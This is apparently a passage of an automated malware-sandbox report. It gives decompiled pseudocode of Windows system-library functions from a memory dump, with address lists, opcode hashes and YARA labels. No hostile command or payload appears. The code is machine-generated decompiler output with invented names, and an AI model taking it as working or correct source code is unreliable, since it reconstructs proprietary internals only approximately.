										L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                        0x048cf0d3
                                                        0x048cf0d9
                                                        0x048cf0e0
                                                        0x048cf0e7
                                                        0x048cf0f2
                                                        0x048cf0f4
                                                        0x048cf0f8
                                                        0x048cf100
                                                        0x048cf108
                                                        0x048cf10d
                                                        0x048cf115
                                                        0x048cf116
                                                        0x048cf11f
                                                        0x048cf123
                                                        0x048cf124
                                                        0x048cf12c
                                                        0x048cf130
                                                        0x048cf134
                                                        0x048cf13d
                                                        0x048cf144
                                                        0x048cf14b
                                                        0x048cf152
                                                        0x0490bab0
                                                        0x0490bab0
                                                        0x048cf158
                                                        0x048cf158
                                                        0x048cf15a
                                                        0x048cf160
                                                        0x048cf165
                                                        0x048cf166
                                                        0x048cf16f
                                                        0x048cf173
                                                        0x0490baa7
                                                        0x0490baa7
                                                        0x0490baab
                                                        0x00000000
                                                        0x048cf179
                                                        0x048cf179
                                                        0x048cf18d
                                                        0x048cf191
                                                        0x0490baa2
                                                        0x00000000
                                                        0x048cf197
                                                        0x048cf19b
                                                        0x048cf1a2
                                                        0x048cf1a9
                                                        0x048cf1af
                                                        0x048cf1b2
                                                        0x048cf1b6
                                                        0x048cf1b9
                                                        0x048cf1c0
                                                        0x048cf1c4
                                                        0x048cf1d8
                                                        0x048cf1df
                                                        0x048cf1e3
                                                        0x048cf1e6
                                                        0x048cf1eb
                                                        0x048cf1ee
                                                        0x048cf1f4
                                                        0x048cf20f
                                                        0x0490bab7
                                                        0x0490babb
                                                        0x0490bacc
                                                        0x0490bad1
                                                        0x048cf215
                                                        0x048cf218
                                                        0x048cf226
                                                        0x048cf22b
                                                        0x00000000
                                                        0x048cf22b
                                                        0x048cf1f6
                                                        0x048cf1f6
                                                        0x048cf1f9
                                                        0x048cf1fb
                                                        0x048cf1fb
                                                        0x048cf1f4
                                                        0x048cf191
                                                        0x048cf173
                                                        0x048cf152
                                                        0x048cf203

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                        • Instruction ID: 7e53d53769705326330e2ed6fcc19a8c3b60a67678b322f825d0cc40e3c27660
                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                        • Instruction Fuzzy Hash: 5B515A71505714AFD321DF59C840A6BBBF9BF48714F008A2EFA95C7690E7B4E904CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04913540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E04913540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x498d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E048D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04913706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E048DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04913540;
						E048DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E048EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04920C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E048D97C0();
					}
					return E048DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04913971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04913884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E048DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E048D9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04913787(_a4,  &_v352, _t80);
						}
					}
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E048D95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                        0x04913552
                                                        0x0491355a
                                                        0x0491355d
                                                        0x04913566
                                                        0x04913567
                                                        0x0491357e
                                                        0x0491358f
                                                        0x049135a1
                                                        0x049135a5
                                                        0x0491366b
                                                        0x0491366b
                                                        0x0491366d
                                                        0x04913672
                                                        0x04913679
                                                        0x04913685
                                                        0x0491368d
                                                        0x0491369d
                                                        0x049136a7
                                                        0x049136b8
                                                        0x049136c6
                                                        0x049136c7
                                                        0x049136dc
                                                        0x049136e1
                                                        0x049136e7
                                                        0x049136e9
                                                        0x049136e9
                                                        0x04913703
                                                        0x04913703
                                                        0x049135b5
                                                        0x049135c0
                                                        0x049135c4
                                                        0x00000000
                                                        0x00000000
                                                        0x049135ca
                                                        0x049135d7
                                                        0x049135e2
                                                        0x049135e6
                                                        0x049135e8
                                                        0x049135f5
                                                        0x049135fa
                                                        0x04913603
                                                        0x04913604
                                                        0x04913609
                                                        0x0491360a
                                                        0x04913612
                                                        0x04913613
                                                        0x0491361e
                                                        0x04913622
                                                        0x04913628
                                                        0x0491362f
                                                        0x0491362f
                                                        0x04913636
                                                        0x04913638
                                                        0x0491363b
                                                        0x04913642
                                                        0x04913642
                                                        0x04913636
                                                        0x04913657
                                                        0x04913657
                                                        0x0491365c
                                                        0x04913662
                                                        0x04913669
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: BinaryHash
                                                        • API String ID: 2994545307-2202222882
                                                        • Opcode ID: 3fca86f9680ebfc81d4b5a19e30a6d53488ec97861ee6c6e4deec257617b9804
                                                        • Instruction ID: 730877a459bdd14f4b0ddfd90d24ced1cddb13063b9ab3bac22b39bf1c42bea9
                                                        • Opcode Fuzzy Hash: 3fca86f9680ebfc81d4b5a19e30a6d53488ec97861ee6c6e4deec257617b9804
                                                        • Instruction Fuzzy Hash: E14146F1D0152C9FEB21DA54CC81FDEB77CAB44758F0046A5EA09A7250DB70AE88CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049605AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E049605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E049607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E048D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0495A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0495A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04961293(_t79, _v40, E049607DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E048B7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0495138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                        0x049605c5
                                                        0x049605ca
                                                        0x049605d3
                                                        0x049606db
                                                        0x049606db
                                                        0x049606dd
                                                        0x049606e3
                                                        0x049606e3
                                                        0x049605dd
                                                        0x049605e7
                                                        0x049605f6
                                                        0x04960600
                                                        0x04960607
                                                        0x04960610
                                                        0x04960615
                                                        0x0496061a
                                                        0x0496061c
                                                        0x0496061e
                                                        0x04960624
                                                        0x04960625
                                                        0x04960627
                                                        0x04960628
                                                        0x04960631
                                                        0x04960640
                                                        0x0496064d
                                                        0x04960654
                                                        0x04960654
                                                        0x04960631
                                                        0x0496066d
                                                        0x04960674
                                                        0x00000000
                                                        0x00000000
                                                        0x04960692
                                                        0x0496069e
                                                        0x049606b0
                                                        0x049606a0
                                                        0x049606a9
                                                        0x049606a9
                                                        0x049606b8
                                                        0x049606d6
                                                        0x049606d6
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `
                                                        • API String ID: 0-2679148245
                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                        • Instruction ID: 18b2c2809c9196981aeab0eb98b0600c9fd318629e17dbb0dd387cf7aa89262e
                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                        • Instruction Fuzzy Hash: 9031E0326003456BE720DE24CD85F9A7799BBC4758F044639FA59AB2C0D770F904CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04913884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E04913884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E048D9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L048B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E048D9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                        0x04913893
                                                        0x04913896
                                                        0x04913899
                                                        0x0491389f
                                                        0x049138a0
                                                        0x049138a4
                                                        0x049138a9
                                                        0x049138ac
                                                        0x049138ad
                                                        0x049138ae
                                                        0x049138af
                                                        0x049138b1
                                                        0x049138b4
                                                        0x049138bb
                                                        0x049138bc
                                                        0x049138bd
                                                        0x049138c4
                                                        0x049138c8
                                                        0x049138ca
                                                        0x049138ca
                                                        0x049138d5
                                                        0x0491393e
                                                        0x04913940
                                                        0x04913942
                                                        0x04913952
                                                        0x04913954
                                                        0x04913961
                                                        0x04913961
                                                        0x04913967
                                                        0x0491396e
                                                        0x0491396e
                                                        0x04913947
                                                        0x0491394c
                                                        0x00000000
                                                        0x0491394c
                                                        0x049138ea
                                                        0x049138ee
                                                        0x049138f8
                                                        0x049138f9
                                                        0x049138ff
                                                        0x04913900
                                                        0x04913902
                                                        0x04913903
                                                        0x0491390b
                                                        0x0491390f
                                                        0x04913950
                                                        0x00000000
                                                        0x04913950
                                                        0x04913915
                                                        0x0491391d
                                                        0x0491391d
                                                        0x04913922
                                                        0x04913926
                                                        0x00000000
                                                        0x04913928
                                                        0x0491392b
                                                        0x0491392b
                                                        0x04913935
                                                        0x04913937
                                                        0x04913937
                                                        0x00000000
                                                        0x04913935
                                                        0x04913926
                                                        0x049138f0
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: BinaryName
                                                        • API String ID: 2994545307-215506332
                                                        • Opcode ID: 3a8f6febb3c3a3cc53a661c4ab787a25c817f8097fd2fcd3ef02e015c604b75f
                                                        • Instruction ID: bdf039d245e5fd340ba6b1515124a714816e2d2fdd669f92f6544d451292f107
                                                        • Opcode Fuzzy Hash: 3a8f6febb3c3a3cc53a661c4ab787a25c817f8097fd2fcd3ef02e015c604b75f
                                                        • Instruction Fuzzy Hash: B531F17290150EEFFB25DA58C945EABB778EB80B20F018679ED14A7660D730BE00C7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 33%
                                                        			E048CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x498d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E048B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E048DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E048D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E048D95D0();
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                        0x048cd29c
                                                        0x048cd2a6
                                                        0x048cd2b1
                                                        0x048cd2b5
                                                        0x048cd2b6
                                                        0x048cd2bc
                                                        0x048cd2bd
                                                        0x048cd2be
                                                        0x048cd2bf
                                                        0x048cd2c2
                                                        0x048cd2c4
                                                        0x048cd2cc
                                                        0x048cd384
                                                        0x048cd34b
                                                        0x048cd34f
                                                        0x048cd350
                                                        0x048cd351
                                                        0x048cd35c
                                                        0x048cd35c
                                                        0x048cd2d6
                                                        0x048cd2da
                                                        0x048cd2e1
                                                        0x048cd361
                                                        0x048cd369
                                                        0x048cd36d
                                                        0x048cd2e3
                                                        0x048cd2e3
                                                        0x048cd2e3
                                                        0x048cd2e5
                                                        0x048cd2ed
                                                        0x048cd2f5
                                                        0x048cd2fa
                                                        0x048cd302
                                                        0x048cd303
                                                        0x048cd30b
                                                        0x048cd30f
                                                        0x048cd313
                                                        0x048cd318
                                                        0x048cd31c
                                                        0x048cd320
                                                        0x048cd379
                                                        0x048cd37d
                                                        0x00000000
                                                        0x00000000
                                                        0x0490affe
                                                        0x0490b001
                                                        0x0490b011
                                                        0x00000000
                                                        0x048cd322
                                                        0x048cd322
                                                        0x048cd330
                                                        0x048cd337
                                                        0x048cd35d
                                                        0x048cd339
                                                        0x048cd33f
                                                        0x048cd38c
                                                        0x048cd38c
                                                        0x048cd33f
                                                        0x048cd349
                                                        0x00000000
                                                        0x048cd349

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 70f5602e4787213ef6a8bec66227c00ce5c3a7c7b257884eac3e6db1bff63780
                                                        • Instruction ID: 699975672ab46a598d5565a97da1fff06b8543cf4f1a63fa6295fd57c566ade1
                                                        • Opcode Fuzzy Hash: 70f5602e4787213ef6a8bec66227c00ce5c3a7c7b257884eac3e6db1bff63780
                                                        • Instruction Fuzzy Hash: AD315CB16093459FD311EF2CC98096BBBE8EB85658F000E2EF994C3250E638ED04DBD2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E048A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E048DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E048DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E048DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L048B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                        0x048a1b8f
                                                        0x048a1b9a
                                                        0x048a1b9c
                                                        0x048a1b9e
                                                        0x048a1ba3
                                                        0x048f7010
                                                        0x048f7010
                                                        0x00000000
                                                        0x048a1ba9
                                                        0x048a1ba9
                                                        0x048a1bae
                                                        0x00000000
                                                        0x048a1bc5
                                                        0x048a1bca
                                                        0x048a1bcf
                                                        0x048a1bd0
                                                        0x048a1bd1
                                                        0x048a1bd2
                                                        0x048a1bd6
                                                        0x048a1bdc
                                                        0x048a1be0
                                                        0x048f6ffc
                                                        0x048f7000
                                                        0x00000000
                                                        0x048f7006
                                                        0x048f7009
                                                        0x048f7009
                                                        0x048a1be6
                                                        0x048a1bec
                                                        0x048a1c0b
                                                        0x048a1c0b
                                                        0x048a1c0c
                                                        0x048a1c11
                                                        0x048a1c12
                                                        0x048a1c15
                                                        0x048a1c1b
                                                        0x048a1c1f
                                                        0x048a1c31
                                                        0x048a1c33
                                                        0x048f7026
                                                        0x048f7026
                                                        0x048a1c21
                                                        0x048a1c24
                                                        0x048a1c24
                                                        0x048a1bee
                                                        0x048a1bee
                                                        0x048a1bf2
                                                        0x048a1c3a
                                                        0x048a1bf4
                                                        0x048a1bf4
                                                        0x048a1c05
                                                        0x048a1c05
                                                        0x048a1c09
                                                        0x048a1c3e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a1c09
                                                        0x048a1bec
                                                        0x048a1be0
                                                        0x048a1bae
                                                        0x048a1c2e

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: WindowsExcludedProcs
                                                        • API String ID: 0-3583428290
                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                        • Instruction ID: 07c2e2fd878e8bc6f186246b2309172f6397437f66922e5c5b115f909304509e
                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                        • Instruction Fuzzy Hash: 0D21F836601228ABFB21AE99C844F5BB76DEF81B54F054E25FD04DB200E6B0FD10A7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048BF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                        0x048bf71d
                                                        0x048bf722
                                                        0x048bf726
                                                        0x04904770
                                                        0x048bf765
                                                        0x048bf769
                                                        0x048bf769
                                                        0x048bf732
                                                        0x0490477a
                                                        0x00000000
                                                        0x0490477a
                                                        0x048bf738
                                                        0x048bf73a
                                                        0x048bf73c
                                                        0x048bf73f
                                                        0x048bf746
                                                        0x048bf778
                                                        0x048bf7a9
                                                        0x048bf7a9
                                                        0x048bf754
                                                        0x048bf75a
                                                        0x048bf75d
                                                        0x048bf75f
                                                        0x048bf761
                                                        0x048bf76f
                                                        0x048bf771
                                                        0x048bf771
                                                        0x048bf76f
                                                        0x048bf763
                                                        0x00000000
                                                        0x048bf763
                                                        0x048bf77d
                                                        0x048bf7a3
                                                        0x048bf7a5
                                                        0x00000000
                                                        0x048bf7a5
                                                        0x048bf77f
                                                        0x048bf782
                                                        0x048bf784
                                                        0x048bf786
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048bf788
                                                        0x048bf748
                                                        0x048bf74d
                                                        0x048bf78d
                                                        0x048bf793
                                                        0x048bf7b7
                                                        0x048bf7bc
                                                        0x00000000
                                                        0x048bf7bc
                                                        0x048bf798
                                                        0x00000000
                                                        0x00000000
                                                        0x048bf79d
                                                        0x048bf7b0
                                                        0x00000000
                                                        0x048bf7b0
                                                        0x048bf79f
                                                        0x00000000
                                                        0x048bf74f
                                                        0x048bf74f
                                                        0x00000000
                                                        0x048bf74f

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx
                                                        • API String ID: 0-89312691
                                                        • Opcode ID: bea640cde0d14c46a01d990bf21eb8680192e2d63e46e93f6a7ebe9550b71e5d
                                                        • Instruction ID: f494be3154f1d51eb84cf3dbd282e2f14e6c92410f3fd9ed2c5c42d4ad532a2f
                                                        • Opcode Fuzzy Hash: bea640cde0d14c46a01d990bf21eb8680192e2d63e46e93f6a7ebe9550b71e5d
                                                        • Instruction Fuzzy Hash: 38117F353046869FE7244E1D8C906B67395EB85728F244FAAEFE1CB391E760F84083C8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

